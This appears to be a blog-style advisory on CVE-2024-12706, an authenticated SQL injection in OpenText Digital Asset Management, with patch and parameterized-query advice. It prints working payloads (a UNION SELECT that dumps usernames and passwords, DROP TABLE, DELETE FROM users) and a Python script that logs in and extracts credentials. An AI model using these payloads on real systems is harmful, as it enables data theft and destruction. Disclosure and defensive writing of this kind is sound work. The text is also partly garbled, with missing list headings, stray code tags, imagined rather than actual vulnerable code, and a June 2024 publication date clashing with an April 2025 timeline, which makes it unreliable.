Published: June 2024
Severity: Critical
Quick Summary
A major security hole — CVE-2024-12706 — has been found in all versions of OpenText™ Digital Asset Management (DAM) up to 24.4. The bug is due to improper neutralization of special elements in SQL commands, commonly called an SQL Injection vulnerability. If you are using OpenText DAM, you must act swiftly.
In simple words: If a user is logged in, they can make DAM’s database run any SQL they want. This could lead to data theft, corruption, or even full system takeover.
What is CVE-2024-12706?
- Vulnerability Type: SQL Injection (CWE-89)
Authentication Required: Yes
This bug is caused by missing or incorrect handling of special SQL characters in user input. When the application builds SQL commands using raw data from authenticated users (like search queries or filters) and fails to sanitize it, attackers can inject and execute arbitrary SQL commands.
How Does the Attack Work?
Let’s imagine a search box in the DAM application for finding digital assets. To make things easy, the backend server might build the query using something like:
search_term = request.GET['query']
sql = f"SELECT * FROM assets WHERE name LIKE '%{search_term}%'"
cursor.execute(sql)
If the input isn’t sanitized, an attacker could submit ' OR 1=1 -- as the search term, turning the SQL into:
SELECT * FROM assets WHERE name LIKE '%' OR 1=1 -- %'
' UNION SELECT username, password, NULL FROM users --
- Delete tables/data:
sql
'; DROP TABLE assets; --
- Create new high-privilege accounts!
---
## Real-World Exploit Example
Let’s say DAM has a form field called assetID, where users can fetch asset details. If vulnerable, an attacker can POST data like:
http
POST /api/asset/details
Content-Type: application/x-www-form-urlencoded
assetID=1; DROP TABLE assets; --
Or, in-app, for a search/filter GET parameter:
https://dam.example.com/search?query='; DELETE FROM users; --
If the code directly interpolates the query value:
python
query = request.GET['query']
sql = f"SELECT * FROM assets WHERE name LIKE '%{query}%'"
cursor.execute(sql)
Danger – the DELETE FROM users SQL command is executed.
---
## Proof-of-Concept (PoC) SQL Injection Payload
Here’s a simple Python3 script using requests to test vulnerable endpoints:
python
import requests
session = requests.Session()
Login (adjust for your DAM login endpoint)
session.post('https://dam.example.com/login', data={'username': 'YOURUSER', 'password': 'YOURPASS'})
Exploit vulnerable search endpoint
payload = "' UNION SELECT 1,username,password FROM users--"
resp = session.get('https://dam.example.com/search', params={'query': payload})
print(resp.text)
`
If the output contains usernames or password hashes — *the site is vulnerable*.
---
## Who Is at Risk?
OpenText DAM customers not yet on version 24.5 or later.
If your DAM platform is publicly exposed, and you have many user accounts, *this is urgent*.
---
## How Do I Fix It?
- Patch Immediately: OpenText has released a fix in version 24.5.
Advisory and Patch Instructions (official)
- Sanitize Inputs: All www-facing forms and API endpoints should use _prepared statements or parameterized queries_ instead of direct string concatenation.
- Review Access Control: Minimize database privileges for DAM service accounts.
---
## Reference Links
- NVD entry for CVE-2024-12706
- OpenText Security Bulletin
- OWASP SQL Injection
---
## Conclusion
CVE-2024-12706 is a critical, confirmed SQL Injection vulnerability in a widely deployed enterprise DAM suite. If exploited, it could let internal attackers or disgruntled users wipe or steal sensitive digital assets. Don’t delay:
- Update to 24.5 or later NOW
- Audit your exposed endpoints
- Remediate with secure coding
If you work with OpenText Digital Asset Management, check your version immediately and work with IT Security to roll out the patch.
---
## Questions?
Let us know below if you need specific patching steps, or want us to analyze your DAM setup for lingering risks.
---
*Written exclusively for this post, 2024.*
Timeline
Published on: 04/28/2025 18:15:46 UTC
Last modified on: 04/29/2025 13:52:10 UTC